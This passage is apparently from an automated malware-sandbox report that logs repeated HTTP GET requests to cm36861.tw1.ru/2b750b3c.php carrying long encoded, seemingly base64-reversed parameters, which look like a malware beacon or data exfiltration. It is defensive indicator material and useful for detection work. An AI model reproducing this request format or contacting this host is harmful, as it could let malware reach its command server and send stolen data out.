text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9U